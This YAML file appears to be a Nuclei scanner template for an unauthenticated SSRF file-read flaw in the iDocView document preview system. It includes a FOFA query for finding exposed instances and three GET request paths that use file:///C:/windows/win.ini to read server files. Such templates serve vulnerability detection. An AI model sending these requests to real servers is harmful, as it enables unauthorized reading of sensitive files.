id: idocview-view-url-fileread

info:
  name: idocview url - fileread
  author: leadlife,dddd
  severity: high
  description: iDocView是一个在线文档预览系统，iDocview /view/url 接口url参数存在SSRF漏洞，未授权的攻击者可以利用此接口读取服务器敏感文件。
  reference:
    - changting
  metadata:
    verified: true
    fofa-query: title=="在线文档预览 - I Doc View"
  tags: idocview,fileread

http:
  - method: GET
    path:
      - "{{BaseURL}}/view/url?url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini"
      - "{{BaseURL}}/view/url.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi"
      - "{{BaseURL}}/view/{{key}}.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi"

    extractors:
      - type: regex
        name: key
        part: header_1
        internal: true
        group: 1
        regex:
          - " (.*?)\\?url="

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "\\[(font|extension|file)s\\]"

      - type: status
        status:
          - 200